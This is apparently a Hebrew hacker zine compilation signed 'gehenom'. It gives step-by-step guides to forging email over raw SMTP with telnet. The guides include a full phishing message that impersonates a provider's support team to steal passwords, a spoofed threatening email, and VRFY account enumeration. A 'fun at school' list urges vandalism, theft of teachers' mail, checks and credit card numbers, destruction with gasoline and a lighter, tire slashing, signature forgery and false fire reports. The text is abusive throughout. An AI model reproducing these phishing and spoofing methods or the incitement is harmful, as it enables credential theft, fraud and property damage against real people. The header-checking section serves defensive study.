‫מש שאתם רוצים‪ ...‬להראות לחברים‪ ,‬להדפיס‪ ,‬או לא יודע מה‪ ...‬בכל אופן‪ ,‬הנה הדוגמאות‪:‬‬
‫‪smtp.***.com esmtp cpmta-3_2_3_0 - no uce 220‬‬

‫‪helo‬‬
‫‪.smtp.***.com hi-250‬‬
pipelining-250
auth=login-250
8bitmime 250
mail from: ***@***.net.il
ok 250
rcpt to: ***@***.com
ok 250
data
go ahead 354
date: 10 nov 12:31
subject: error in i/o section
from: *** support team
to: ***@****.com
!hello from ***.com

i'm sorry to inform you that there has been an error
in the i/o section of your account database, and this server's
,password information has been temporarily destroyed. we need you
.the *** user, to hit reply and type your password in the subject
,thank you for your help

.the *** support team
.
ok 973843116 qp 14873 250
quit
smtp.***.com closing connection 221
.‫בכל מקום שאתם רואים '***' זה אומר שמחקתי את מה שהיה ושמתי *** במקום‬
.‫ שולח ונמען‬,‫ החלטתי שעדיף שלא תדעו את שמות השרת‬.‫עשיתי את זה כדי לצנזר‬
‫ מה שעשיתי באימייל הזה זה שלחתי אימייל למשתמש של ספק‬,‫ כמו שאתם רואים‬,‫בכל מקרה‬
,‫מסויים‬
‫ הוא מתבקש לשלוח‬.‫כאשר הוא חושב שהוא קיבל את האימייל הזה מצוות התמיכה של אותו ספק‬
‫את הסיסמא‬
‫ התוכנת דואר אומרת לו‬,‫ כשהוא מגיב עם הסיסמא‬,‫ עכשיו‬.‫שלו בכדי שיוכלו לתקן איזה בעיה בשרת‬
‫שזה‬
‫ זה‬.‫ אבל מה שבאמת קורה זה שזה שולח את זה למישהו אחר‬,‫ של אותו ספק‬support team ‫נשלח ל‬
‫שולח את זה‬
‫ עכשיו לדוגמא‬.‫שמחתי זה לא עובד ככה בכל שרת דואר‬/‫ אבל לצערי‬.mail from ‫לכתובת שכתבנו ב‬
:‫הבאה‬
no uce( esmtp server ready at mon feb 12 00:24:26 2001( ***-220

esmtp spoken here 220
helo
helo requires domain address 501
helo ***.com
requested mail action okay, completed 250
need mail before rcpt 503
mail from: webmaster@***.com
requested mail action okay, completed 250
‫‪invalid address 550‬‬
‫‪rcpt to: ***@***.com‬‬
‫‪requested action not taken:user account inactive 550‬‬
‫‪rcpt to: ***@***.com‬‬
‫‪requested mail action okay, completed 250‬‬
‫‪data‬‬
‫‪>start mail input; end with <crlf>.<crlf 354‬‬
‫‪date: 13 nov 98 11:05‬‬
‫‪subject: fuck you‬‬
‫‪from: ***.com‬‬
‫‪to: ***@***.net‬‬
‫‪.hi there‬‬
‫‪.you better start shakin you fuckin asshole‬‬
‫‪.you damn jew hater. fuck it off. i took you site down‬‬
‫‪...if you put it back up, i'll take it down again‬‬
‫‪!no nazis aloud on the net‬‬
‫‪.suck it you motherfucker‬‬
‫‪.‬‬
‫‪requested mail action okay, completed 250‬‬
‫‪quit‬‬
‫‪service closing transmission channel 221‬‬
‫כמו שאתם רואים‪ ,‬באימייל הזה השרת לא הסכים לקבל את פקודת ה ‪ helo‬שלי‪ ,‬וביקש שאכתוב גם‬
‫דומיין‪.‬‬
‫רק אח"כ הוא נתן לי להמשיך‪ .‬כמו כן‪ ,‬לפני ה ‪ mail‬כתבתי ‪ rpct‬מה שגרם לשרת להגיד לי שלפני‬
‫שאני‬
‫כותב ‪ rcpt‬עלי לכתוב ‪ mail‬ורק אחרי זה אוכל לכתוב ‪ .rcpt‬אח"כ‪ ,‬כשכתבתי את ה ‪ rcpt‬הבא‪ ,‬השרת‬
‫העיר‬
‫לי שהכתובת אינה תקינה‪ .‬ובניסיון השני הוא העיר לי שהשם משתמש לא קיים‪ .‬רק בניסיון השלישי‬
‫הוא הסכים‪.‬‬
‫כלומר‪ ,‬שרתי הדואר הם בד"כ מאוד ידודיתיים ויש להם יכולת תקשור נוחה יותר‬
‫מאשר לשרתים אחרים כגון ‪ pop‬או ‪ .http‬טוב‪ ,‬עכשיו כמו שהבטחתי מקודם‪ ,‬אני אראה לכם איך גם‬
‫אתם יכולים להקליט את הזיופים שלכם‪.‬‬
‫פיתחו את חלון ה ‪ .telnet‬למי שלא זוכר‪ ,‬לוחצים על התחל‪ ,‬הפעלה‪ ,‬ואז מקלידים ‪.telnet‬‬
‫כעת לחצו על תפריט ה ‪ terminal‬ובחרו ב ‪ .start logging‬אתם תתבקשו להקליד את שם הקובץ‬
‫שעליו‬
‫ברצונכם להקליט את הזיוף‪ .‬לדוגמא‪ c:\fake :‬או ‪ .c:\yonatan\hacking\test‬מה שבא לכם‪...‬‬
‫אח"כ תתחברו לשרת הדואר ותעשו מה שאתם רוצים‪( .‬או כל שרת בעצם‪ ,‬לאו דווקא דואר‪)...‬‬
‫כשאתם גומרים ורוצים לסיים את ההקלטה‪ ,‬בחרו ב‪ ,terminal :‬ואז ‪.stop logging‬‬
‫עכשיו סגרו את חלון הטלנט‪ ,‬ופיתחו את הקובץ שעליו הקלטתם‪ .‬לקובץ יהיה סיום של ‪.log‬‬
‫‪test.log‬‬
‫‪cool.log‬‬
‫‪fuckit.log‬‬
‫וכו'‪.....‬‬
‫זהו‪ .‬רק דבר אחרון לפני שאתם עוברים לחלק השלישי והאחרון‪,‬‬
‫הרבה שרתים תומכים בפקודה מאוד יעילה‪ ,‬והיא פקודת ‪.help‬‬
‫נסו את זה בכמה שרתי דואר שונים‪ .‬שחקו עם זה‪ .‬זה יכול לעזור לכם מאוד לפעמים‪.‬‬
‫מקווה שהבנתם משהו‪,‬‬

‫‪gehenom‬‬
‫"‪"the minute that it's born it begins to die ...‬‬

‫( ‪)marilyn manson‬‬
‫הגעתם לחלק האחרון של המדריך השלם לזיוף אימייל‪.‬‬

‫אתם לא ממש מוזמנים לפה‪ ,‬אף אחד לא ביקש ממכם לבוא‪ ,‬ואתם גם לא הכי רצויים‪ ,‬אבל אתם‬
‫כאן‪.‬‬
‫אז אם אתם כבר כאן‪ ,‬בואו נתחיל‪ .‬בחלק זה אני אראה לכם פקודות חדשות ושימושיות‪ .‬ואת האמת‪,‬‬
‫גם ממש ממש מגניבות‪ .‬חוץ מזה אתם גם תלמדו איך לבדוק אם האימייל שקיבלתם מזויף או לא‪,‬‬
‫וגם איך‬
‫לאתר את הזייפן הבן זונה‪ .‬טוב‪ ,‬נתחיל עם הפקודות המיוחדות החדשות‪ .‬אני בטוח שתיהנו לשחק‬
‫אייתם‪.‬‬
‫אני אראה לכם פה ‪ 3‬פקודות מגניבות‪ .‬שלושת הפקודות הם‪:‬‬
‫‪rset‬‬
‫‪vrfy‬‬
‫‪noop‬‬
‫הראשון‪ ,rset ,‬תפקידו זה לעשות ‪ reset‬למידע ששלחתם לשרת עד עכשיו‪.‬‬

‫כלומר למחוק הכל‪ .‬לדוגמא‪ ,‬התחלתם זיוף אימייל‪ ,‬הגעתם כמעט לסוף‪ ,‬ופתאום החלטתם שיצא‬
‫חרא ואתם רוצים להתחיל מהתחלה‪ ,‬כל שעליכם לעשות הוא להקליד את הפקודה ‪ rset‬וזהו‪.‬‬
‫עכשיו אתם יכולים להתחיל מחדש‪ .‬הפקודה הבאה שלנו היא ‪ .vrfy‬מה שפקודת ה ‪ vrfy‬עושה זה‬
‫בודקת‬
‫אם משתמש מסויים קיים במערכת‪.‬‬
‫לדוגמא אתם רוצים לדעת אם כתובת האימייל ‪ slut@zahav.net.il‬באמת קיימת‪,‬‬
‫אתם מתחברים לשרת הדואר של אינטרנט זהב‪ ,‬ומקלידים‪:‬‬
‫‪vrfy slut‬‬
‫השרת יגיד לכם אם החשבון ‪ slut‬אכן קיים או לא‪ .‬זה יכול להיות מאוד מאוד יעיל במקרים‬
‫מסוימים‪,‬‬
‫אך בד"כ משתמשים בזה חברות מסחריות שרוצות לשלוח לכם מליון‬
‫פרסומות מעצבנות כי הם חושבים שהם ירוויחו מזה כסף ולא קולטים‬
‫שהם סתאם מעצבנים וגורמים לנו לשנוא אותם ואת המוצרים המחורבנים שלהם‪.‬‬
‫טוב‪ ,‬לפקודה הבאה והאחרונה‪ .‬הפקודה ‪ noop‬היא פקודה שתפקידה לעשות‪ ....‬כלום‪.‬‬
‫הפקודה ‪ noop‬לא עושה כלום‪ .‬זה מה שמיוחד ומגניב בא‪ .‬תנסו בעצמכם‪ .‬מומלץ מאוד‪ .‬הפקודה‬
‫קיימת בהרבה מאוד שרתי דואר‪ .‬אז למה היא קיימת אם היא לא עושה כלום? כי את האמת היא כן‬
‫עושה משהו‪...‬‬
‫רק לא משהו שממש נראה לעין‪ .‬היא פשוט מאוד נקלטת לשרת‪ ,‬ובד"כ גם מחזירה פלט אל מסך‬
‫המחשב שלכם האומר‬
‫שהפקודה נקלטה‪ ,‬התקבלה וכו'‪ .‬כלומר‪ ,‬זה יכול להיות יעיל כדי לבדוק שהחיבור בסדר‪ ,‬או סתאם‬
‫את מהירות‬
‫תגובת שרת הדואר וכל מיני שטויות כאלה‪...‬‬
‫גילוי אימייל מזויף ואיתור הבן זונה‬

‫עכשיו נגיד קיבלתם אימייל והוא נראה לכם חשוד‪ .‬איך בודקים בוודאות?‬
‫מסתכלים בראשים (‪ )headers‬של המכתב‪ .‬איך עושים את זה? זה קצת שונה עם כל תוכנה‪,‬‬
‫אבל תחפשו את האופציה באפשרויות (‪ )settings‬של תוכנת הדואר שלכם‪ .‬כנ"ל גם לאלה שהאימייל‬
‫שלהם‬
‫הוא ‪ .web based email‬כלומר שהאימייל שלהם הוא ב ‪ newmail‬או ‪ hotmail‬וכו'‪ .‬עכשיו‪ ,‬אחרי‬
‫ששיניתם‬
‫את ההגדרות של תוכנת הדואר שלכם להראות את ה ‪ headers‬של כל אימייל‪ ,‬עיברו לקריאת‬
‫האימייל שנראה לכם‬
‫חשוד‪ ,‬והתבוננו ב ‪ .headers‬אם זו הפעם הראשונה שאתם עושים זאת‪ ,‬סביר להניח שזה ייראה לכם‬
‫כמו סתאם‬
‫שטויות באנגלית‪ .‬אבל זה בעצם אינפורמציה יעילה שיכולה לעזור לכם‪.‬‬
‫ובכן‪ ,‬בכל תוכנת דואר הראשים (‪ )headers‬ייראו קצת שונה‪ ,‬ולכן אני אתן פה כמה טיפים לגילוי זיוף‬
‫אימייל שיעבדו גם בתוכנות שבהם מאוד קשה לגלות אם זה מזויף או לא‪ .‬ובכן‪ ,‬דבר ראשון‪ ,‬באימייל‬
‫אמיתי‪,‬‬
‫יהיו בד"כ יותר הסברים והגדרות כי זה נשלח ע"י תוכנת דואר‪ .‬לכן הראשים יהיו בד"כ ארוכים‪.‬‬
‫באימייל מזויף לעומת זאת‪ ,‬שנעשה בד"כ ידנית‪ ,‬לא יהיה הרבה פרטים בראשים‪ ,‬והם יהיה הרבה‬
‫יותר קצרים‪.‬‬
‫עכשיו בואו תראו משהו אחר‪ .‬נשווה פה בין ‪ 2‬אימיילים מזויפים ששלחתי לעצמי‪ .‬אחד ל‬
‫‪altavista.com‬‬
‫ואחד ל ‪.hotmail.com‬‬
‫בואו נראה קודם את האחד ב ‪:hotmail.com‬‬
‫‪from admin@hotmail.com.com sat dec 09 16:34:21 2000‬‬

‫‪received: from [212.179.186.110] by hotmail.com )3.2( ; sat dec 09 16:32:54 2000‬‬
‫‪subject: congradulations‬‬
‫‪date: sat dec 09‬‬
‫כמו שאתם רואים השלוח טוען שהוא ‪admin@hotmail.com.com‬‬

‫אבל כתוב שכתובת האיי פי שלו היא ‪212.179.186.110‬‬
‫אם נבדוק את האיי פי של ‪ hotmail.com‬נראה שזה בכלל ‪64.4.11.7‬‬
‫כלומר יש לנו פה שתי מחשבים מאוד שונים‪ .‬כמו כן אם נבדוק את הכתובת של ‪212.179.186.110‬‬
‫אנחנו‬
‫נראה שזה בעצם ‪ .bzq-186-110.bezeqint.net‬כלומר משתמש של בזק בינלאומי‪** .‬בום** תפסנו‬
‫אותו‪.‬‬
‫עכשיו באלטה ויזטה המצב מאוד דומה‪:‬‬
‫‪from: admin@nba.com‬‬
‫‪date: sun 11 november‬‬
‫‪subject: congradulations‬‬
‫‪)received: from unknown )helo nba.com( )212.179.186.110‬‬
‫‪by smtp.altavista.com )209.228.13.94( with smtp; 9 dec 2000 16:46:20 -0800‬‬
‫הפעם השולח טוען שהוא ‪admin@nba.com‬‬

‫לכן נבדוק את האיי פי של ‪ nba.com‬ומתברר לנו שזה ‪204.202.128.223‬‬
‫מה שלא ממש דומה ל ‪ 212.179.186.110‬אשר מתברר להיות אותו משתמש של בזק בינלאומי‬
‫ממקודם‪.‬‬
‫כמו כן יש לנו כאן את כתובת השרת דואר שקיבל את המכתב‪209.228.13.94 .‬‬
‫אנחנו מקבלים את התאריך והשעה המדויקים של מתי נשלח המכתב‪ .‬שחקו עם זה‪...‬‬
‫שוב‪ ,‬אני ממש ממש ממליץ לקרוא את ‪ rfc 821‬לכל מי שיודע אנגלית‬
‫או שסתאם רוצה להעמיק את הידע באימייל‪ .‬קריאת ה ‪ rfc‬תיתן לכם הרבה יותר הבנה של הנושא‪.‬‬
‫מקווה ש ‪ 3‬העמודים הארוכים והמשעממים האלה על אימייל עזרו לכם במשהו‪,‬‬
‫‪gehenom‬‬
‫מדריך זיוף ‪ email‬מקוצר‬
‫[‪ :::::‬הערה ‪ -‬אל תגידו שאתם לא מבינים ותפסיקו לקרוא‪ .‬תקראו עד הסוף ותבינו!!! ‪]:::::‬‬
‫[‪ ::‬למי שעוד לא הבין מה אני רוצה ממנו‪ ,‬תקראו עד הסוף סוף סוף‪ .‬כי בהתחלה הכל לא מובן‪]:: ,‬‬
‫[‪ ::‬ואם קוראים עד הסוף אז הכל כן מובן‪ .‬יפה‪ .‬אז עכשיו תקראו מההתחלה עד הסוף‪ .‬בלי להפסיק‬
‫באמצע‪]:: .‬‬
‫שוב‪ ,‬תקראו עד הסוף‪ .‬גם אם אתם חושבים שלא מבינים כלום‪ .‬תקראו עד הסוף‪ .‬סוף‪ .‬סוף‪.‬‬
‫סוף‪.‬‬
‫אוקי‪ ,‬יא בני זונות עצלנים כוס אימא שלכם‪,‬‬

‫אז בגלל שלרובכם אין כוח לקרוא ‪ 3‬עמודים מלאים על זיוף אימייל כתבתי פה מדריך מקוצר‪.‬‬
‫חסר לכם שאתם לא נהנים ממנו‪ .‬תפיצו את המדריך הזה‪ .‬תנו עותק לכל בנאדם שאתם מכירים‪ .‬טוב‪,‬‬
‫נתחיל‪.‬‬
‫הוראות‪ :‬מתחברים לשרת הדואר‪ ,‬לפורט ‪ .25‬שם כותבים את הפקודות הבאות‪:‬‬
‫‪helo‬‬
‫‪mail from: hacker@hackers.com‬‬
‫‪rcpt to: victim@victim.com‬‬
‫‪data‬‬
‫‪subject: fake email‬‬
‫‪date: mon 23 october‬‬
‫‪this is a fake email‬‬

‫‪have a nice day you bitch‬‬
‫‪.‬‬
‫‪quit‬‬
‫טוב‪ .‬עכשיו כמה הסברים‪:‬‬
‫‪ = hacker@hackers.com‬כתבו במקום את הכתובת שממנה אתם רוצים לשלוח את האימייל‬
‫‪ = victim@victim.com‬כתבו במקום את הכתובת שתקבל את האימייל המזויף‬
‫‪ = fake email‬כתבו כאן את הנושא של האימייל‪ .‬או הכותרת אם אתם רוצים‪( .‬אותו דבר)‬
‫‪ = mon 23 october‬כתבו כאן את התאריך‪ .‬אפשר גם להוסיף שעה כמובן‪.‬‬

‫אפשר גם לכתוב שזה נשלח לפני ‪ 1000‬שנה או ההפך‪ ,‬בשנת ‪ ,4072‬איך שאתם רוצים‪ .‬שחקו עם זה‪.‬‬
‫‪this is a fake email‬‬

‫‪ = have a nice day you bitch‬כתבו כאן את המכתב עצמו‪ .‬אפשר גם בעברית‪.‬‬
‫ודרך אגב‪ ,‬גם את הנושא (או הכותרת לאלה מכם שרוצים) אפשר לכתוב בעברית‪.‬‬
‫רק הערה אחרונה‪ ,‬ואחרונה באמת‪ :‬איך מתחברים לשרת הדואר לפורט ‪??25‬‬
‫ככה‪:‬‬
‫* לחצו על התחל‬
‫* לחצו על הפעלה‪...‬‬
‫* הקלידו‪telnet server 25 :‬‬
‫‪ = server‬כתובת של שרת דואר‬

‫לדוגמא‪ ,‬אם ניקח את הדוגמא מקודם סביר להניח שהשרת דואר היה ‪mail.victim.com‬‬
‫ולכן הייתם מקלידים‪telnet mail.victim.com 25 :‬‬
‫עוד אפשרויות לכתובת נפוצות‪:‬‬
‫‪smtp.victim.com‬‬
‫מה שכבר היה‪mail.victim.com ,‬‬
‫ואחרון חביב ‪victim.com‬‬
‫אז נגיד אתם מזייפים למישהו ב ‪ altavista.com‬אתם תקלידו‪telnet mail.altavista.com 25 :‬‬

‫ואם לא עובד תנסו ‪ smtp.altavista.com‬ואם גם זה לא‪ ,‬אז פשוט ‪ altavista.com‬פשוט‪ ,‬פשוט‪,‬‬
‫פשוט‪.‬‬
‫אם יש בעיות‪ ,‬תקראו את הכתבה המלאה של ה ‪ 3‬עמודים‪ .‬זהו‪ .‬תיהנו‪ .‬שלכם‪,‬‬
‫‪gehenom‬‬
‫דברים כייפים לעשות בבית ספר ‪2 -‬‬
‫לאור הפופלריות של החלק הראשון‪ ,‬צוות האתר החליט לכתוב עוד כתבה בנושא‬
‫'איך ליהנות במקום המחורבן הנקרא בית ספר'‪ .‬אנחנו בטוחים שתיהנו‪ ,‬ומקווים שתבינו‬
‫מה באמת טוב בשבילכם ומי אתם באמת‪ ,‬ושלא תיתנו לבני זונות להשתלט לכם על המוח‪.‬‬
‫טוב‪ ,‬חאלס עם ההקדמה‪ ,‬הנה כל הרעיונות שקפצו לנו לראש‪:‬‬
‫* קחו דבק מגע‪ ,‬ומירחו אותו בנדיבות על כל המנעולים בבית הספר‪.‬‬

‫אח"כ תביטו איך המורים מנסים להכניס את המפתח למנעול‪ .‬הם פשוט מנסים‪ ,‬ומנסים‪ ,‬ומנסים‪...‬‬
‫* אם יש לכם טלוויזיה בבית ספר‪ ,‬ציירו על המסך עם טיפקס‪.‬‬
‫* כשהמסדרונות מלאים‪ ,‬קחו כמה חברים‪ ,‬ותטענו שאתם מחפשים את העדשות מגע שלכם‪,‬‬
‫ושחשוב מאוד שאף אחד לא יזוז‪ ,‬כי מישהו יכול בטעות לדרוך על זה‪...‬‬
‫* מירחו שפתון‪ ,‬דבק‪ ,‬בוץ‪ ,‬או קקי על הידית של הדלת של החדר מורים ושל חדר המנהל‪.‬‬
‫* כייסו מבית מרקחת תרופות נגד הקשת נחש‪ .‬לכו ליד חדר המנהל‪ ,‬תבלעו כדור או שניים‪ ,‬ותיכנסו‬
‫פנימה‪.‬‬
‫התרופה תגרום לכם להקיא‪ .‬תשתדלו להקיא על הכיסא‪ ,‬השטיח‪ ,‬ספרים‪ ,‬וכל מה שנמצא שם‪.‬‬
‫* פרצו את תיבות הדואר של המורים שלכם‪ .‬צלמו עותקים של כל דבר מעניין וחלקו לחברים‪ .‬תרגישו‬
‫חופשי‬
‫להשתמש בצ'קים‪ ,‬כסף מזומן שלפעמים תמצאו‪ ,‬והכי מגניב‪ ,‬אם יהיה לכם מזל‪ ,‬זה מספר כרטיס‬
‫האשראי‪.‬‬
‫* השאירו פתקים ורמזים בכל מקום על כך ש "יום רביעי זה יום הצדק"‬
‫* ביום רביעי אל תעשו כלום‪.‬‬
‫* ביום חמישי אל תעשו כלום‪.‬‬
‫* ביום שישי אל תעשו כלום‪.‬‬
‫* בשבת לכו לבית ספר ותהרסו כל מה שאתם רואים‪ .‬מומלץ להצטייד בפטיש‪ ,‬בנזין‪ ,‬מצית‪,‬‬
‫סכין‪ ,‬והרבה הרבה הרבה אבל באמת שהרבה מצב רוח טוב‪.‬‬
‫* השיגו כמה שיותר דברים חתומים עם חתימת המורה שלכם (הודעות‪ ,‬מבחנים‪ ,‬אישורים‪ ,‬וכו')‪,‬‬
‫ושבו עם הכל כמה שעות ותתחילו לנסות לתרגל את שיטת החתימה שלו‪.‬‬
‫כשתגיעו לרמת זיוף איכותית‪ ,‬תמצאו את החתימה שלו כמשהו שימושי מאוד‪.‬‬
‫* תהיו נחמדים למורים שלכם‪ ,‬והזמינו בשבילם פיצה לבית‪ .‬עשו זאת בשמם ועל חשבונם כמובן‪.‬‬
‫אל תישכחו להזמין מנה משפחתית גדולה עם כל התוספות‪ ,‬ואני חושב שהם גם יירצו לשתות הרבה‪.‬‬
‫ואל תשכחו גלידה‪ ,‬כי אולי הם גם יירצו גם קצת גלידה אחר כך‪...‬‬
‫* אחרי שהם צעקו שעות על איש המשלוח‪ ,‬ונאלצו לשלם ולהיתקע עם הפיצה‪,‬‬
‫אני בטוח שהם ישמחו לקבל ביקור ממכבי האש שיבואו להציל אותם מ"שריפה במטבח"‬
‫או כל שריפה אחרת שתירצו לספר עליה למכבי האש דרך הטלפון‪...‬‬
‫* לכו לשירותים בבית הספר וסתמו את הנקז בכיור עם‬

‫פלסטלינה ותנו לכל המים להשתחרר מהברז‪ .‬עשו זאת בסוף היום‪,‬‬
‫אחרי שכולם כבר הלכו הביתה‪ .‬ביום למחרת כל הבית ספר יהיה מוצף מים‪....‬‬
‫* מורים רבים נוטים להשאיר את היומן שלהם במצבים ומקומות לא מוגנים‪ .‬נצלו זאת בחוכמה‪.‬‬
‫* תתלשו את הסמלים מהמכוניות של המורים שלכם‪ .‬כל סמל עולה בשוק כמאה‪ ,‬מאה חמישים‬
‫שקל‪.‬‬
‫מכירו את הסמלים לאספנים או הוסיפו אותם לאוסף משלכם‪.‬‬
‫* תארגנו שביתה של כל השכבה והתנחלו במסדרון או ליד חדר המורים‪.‬‬
‫* הצטיידו במסמר או שניים ותעשו פנצ'רים בגלגלים של המכוניות של המורים שלכם‪.‬‬

‫כל יום תבחרו מכונית אחרת בצורה אקראית‪ .‬זה הופך את הכיף לגדול יותר‪...‬‬
‫* תנו לכמה תרנגולים או סנאים להסתובב חופשי בבית הספר‪.‬‬

‫השתמשו בלפחות ‪ 5‬תרנגולים‪/‬סנאים וזכרו כי כל המרבה הרי זה משובח‪.‬‬
‫* לכו לשירותים והכניסו כל מיני חפצים כמו כדור טניס‪ ,‬מכונית צעצוע‪ ,‬בובת פוקימן‪ ,‬בלון מנופח‪,‬‬
‫וכו' לתוך האסלה ולאחר מכן הורידו את המים‪ .‬עשו זאת שוב ושוב ושוב עד שכבר אי אפשר להוריד‬
‫את המים‪.‬‬
‫* הניחו שעונים מעוררים בכל מיני מקומות מוסתרים בבית הספר‪ .‬אל תשכחו להפעיל אותם קודם‪.‬‬
‫* תארגנו שילד ישכב על הפנים לכיוון הרצפה‪ .‬כשמורה ויתקרב לאזור‬

‫צירחו בהיסטריות משהו כמו "הוא קפץ!‪ ,‬הוא קפץ" והצביעו לכיוון חלון בקומה שלישית או משהו‪.‬‬
‫* התקשרו מהפלאפון לבית הספר ותעמידו פנים שאתם האבא של איזה ילד בבית הספר‪,‬‬
‫ושיישלחו אותו _עכשיו_ הביתה ושהוא צריך לחזור מהר כי סבתא נפטרה או כי יש מסיבה‬
‫משפחתית לדוד מוטי‬
‫או כל דבר אחר שתחליטו להפליץ‪ .‬תחשבו על סיבות משלכם‪ .‬מקסימום אפשר להגיד שזה בגלל‬
‫אירוע משפחתי‬
‫או שזה משהו אישי וכו'‪.‬‬
‫* פחחחחחחחחחחחחחחחחחחחחחחח‪.....‬‬
‫חשבתם שיש עוד???? צדקתם‪ .‬נו‪ ,‬תעברו ל'*' הבאה‪.‬‬
‫* לכו לקומה שנייה או שלישית בבית הספר‪ ,‬כאשר כמה שיותר גבוה יותר טוב‪.‬‬
‫כעת שחקו את משחק היריקות ע"פ החוקים הבאים‪:‬‬
‫‪ -‬פגיעה בילד‪/‬ילדה מורידה ‪ 3‬נקודות‬

‫‪ -‬פגיעה במורה מוסיפה ‪ 10‬נקודות‬
‫‪ -‬פגיעה בבעל חיים מוסיפה נקודה‬
‫‪ -‬פגיעה בכל דבר אחר לא עושה כלום‬
‫הערות אחרונות‪:‬‬
‫מומלץ להתכופף אחרי כל יריקה כדי שלא ייראו אתכם‪.‬‬
‫המנצח הוא מי שמגיע ראשון ל ‪ 50‬נקודות‪.‬‬
‫כל החוקים פתוחים לשינויים‪.‬‬
‫למי שלא הבין המשחק פועל בדרך הבאה‪ :‬כל אחד יורק בתורו וצובר נקודות (או שלא)‪ .‬תיהנו‪.‬‬
‫* קחו כמה שקיות ניילון שקופות ומלאו אותם בקמח‪ .‬כעת החביאו אותם בכל מיני מקומות שיפחידו‬
‫את מי שיימצא אותם‪ .‬מקומות מומלצים הם באמצע איזה ספר‪ ,‬מתחת לספר‪ ,‬בתוך קלמר‪ ,‬בתוך‬
‫תיק‪ ,‬בתוך ארנק‬
‫או כל מקום אחר של הילדים שהם המטרה שלכם‪ .‬מומלץ שגם תשימו קצת מלח פה ושם למקרה‬
‫שהם ינסו להסניף‬
‫את החומר ואז תשמעו הרבה אאאאאההההההה פצ'ווווווווו ו אאאאאייייייייייייייככככססס‪....‬‬
‫* ולסיום‪ ,‬משהו שכולם מכירים אבל קצת נשכח בשנתיים שלוש האחרונות‪.‬‬
‫קחו עת‪ ,‬או טוש (לורד)‪ ,‬ופרקו את שני הקצוות שלו כך שיישאר לכם מעין קשית פלסטיק‪.‬‬
‫כעת גלגלו כדור קטן של פלסטלינה ושימו אותו בקצה אחד‪ .‬עכשיו תנשפו חזק בקצה השני‬
‫והפלסטלינה תעוף‪.‬‬
‫שחקו עם זה קצת עד שתלמדו להעיף ולכוון טוב‪ .‬אם אין פלסטלינה תמיד אפשר להשתמש בנייר‪.‬‬
‫מומלץ להרטיב אותו לפני שיורים וככה הוא עף יותר טוב‪.‬‬
‫למי שלא מכיר‪ ,‬לכלי הנשק המפגר אך המהנה הזה קוראים טפו טפו‪.‬‬
‫זהו‪ ,‬כאן תם החלק השני של 'איך לכייף בבית הספר'‪.‬‬

‫תדפיסו את מה שקראתם עכשיו‪ ,‬תצלמו כמה עשרות עותקים‪,‬‬
‫תחלקו לחברים‪ ,‬ותיהנו‪.‬‬
‫‪gehenom‬‬
‫אייקונים בביג טוק‬
‫בזמן האחרון‪ ,‬שמעתי מהרבה אנשים‪ ,‬הרבה תלונות‪ ,‬על כך שהם לא יכולים להשתמש בשירות‬
‫האייקונים של אורנג' מהסיבה הפשוטה שיש להם ביג טוק‪ .‬ובכן‪ ,‬לכל הביג טוקים עם ה ‪5110‬‬
‫שלהם‪ ,‬שרוצים לשים אייקון בפלאפון וחשבו שהם לא יכולים‪ ,‬אז טעיתם‪ .‬כי ממעמקי הצד האפל‬
‫של הגיהינום‪ ,‬אני בא אליכם‪ ,‬עם ‪ 100%‬רוע טהור‪ ,‬אני הוא גיהינום‪ ,‬שיראה לכם איך לרמות על הבני‬
‫זונות‪.‬‬
‫ובכן‪ ,‬השיטה פשוטה וקלה ביותר‪ ,‬ואני מתקשה להבין איך אתם הקוראים החכמים שלי לא חשבתם‬
‫על זה לבד‪.‬‬
‫אז ככה‪ ,‬טכנית‪ ,‬הדגם שלכם מסוגל להשתמש באייקונים‪ .‬אבל מה‪ ,‬אורנג' משום מה החליטה‬
‫שמי שיש לו ביג טוק‪ ,‬לא יכול‪ .‬למה? לא יודע‪.‬‬
‫אז איך דופקים אותם?‬

‫קחו פלאפון של מישהו אחר‪ ,‬מאותו דגם‪,‬‬
‫(אם לכם יש ‪ ,6110‬אז קחו ‪ .6110‬אם יש לכם ‪ ,5110‬אז קחו ‪)5110‬‬
‫בעצם זה לא חייב להיות מאותו דגם‪ ,‬אבל סתאם שיהיה יותר מגניב קחו מאותו דגם‪,‬‬
‫ושבעל הפלאפון הזה לא יהיה רשום בשירות ביג טוק‪ ,‬ככה שאצלו שירות האייקונים לא יהיה חסום‪.‬‬
‫זה יכול להיות כל דבר חוץ מביג טוק‪ .‬שיהיה אורנג' בי יו‪ ,‬אורנג' משפחה‪ ,‬זה לא משנה‪...‬‬
‫עכשיו החליפו אייתו את כרטיס ה ‪.sim‬‬

‫איך מחליפים כרטיס ‪?sim‬‬
‫קודם כל תכבו את המכשיר‪.‬‬
‫עכשיו תוציאו את הסוללה מהפלאפון‪ ,‬ושם תראו את מחזיק ה ‪.sim‬‬
‫פיתחו אותו‪ ,‬ושילפו בעדינות את הכרטיס‪ .‬כעת שימו אותו בצד‪,‬‬
‫ותכניסו בפנים את הכרטיס מהפלאפון השני‪.‬‬
‫החזירו את הסוללה למקום‪ ,‬והפעילו את הפלאפון‪.‬‬
‫עכשיו אורנג' לא תזהה שיש לכם ביג טוק‪ ,‬כי מבחינה טכנית כרגע אין לכם‪,‬‬
‫לכן שילחו לעצמכם איזה אייקון שבא לכם‪.‬‬
‫אחרי שהוספתם לכם אייקון פצצה‪ ,‬החליפו בחזרה את כרטיס ה ‪ ,sim‬ונחשו מה? האייקון יישאר‪.‬‬
‫למה? כי הוא נשמר על המכשיר ולא על הכרטיס‪ .‬מקווה מאוווד שתהנווו‪,‬‬
‫‪gehenom‬‬
‫פריצה למחשבים‬
‫כן‪ ,‬זה נכון‪ ,‬אני עומד להסביר לכם צעד אחר צעד ובעברית‪,‬‬
‫איך מהמחשב האישי שלכם בבית‪ ,‬תוכלו לפרוץ למחשבים אחרים‪.‬‬
‫ובכן‪ ,‬סביר להניח שבבית הספר שלכם לדוגמא‪ ,‬ישנה רשת מחשבים מחורבנת‬
‫של המון מחשבים עם ווינדוס ‪ 95/98‬שכולם מחוברים עם איזה חיבור‬
‫מהיר (פחות או יותר) דרך שרת ‪ nt‬וכי לכל המחשבים האלה ישנה רק מדפסת אחת‬
‫או שניים‪ ,‬אך כל המחשבים יכולים להדפיס במדפסת‪ ,‬ויש גם כמה ספריות‪ ,‬על מחשב‬
‫השרת‪ ,‬שלכל המחשבים יש גישה אליהם‪ .‬זה לא כך בכל בית ספר או בכל משרד‬
‫או בכל מוסד חינוכי‪ ,‬או בכל רשת מחשבים עם ווינדוס‪ ,‬אבל זה כך במקרים רבים‪.‬‬
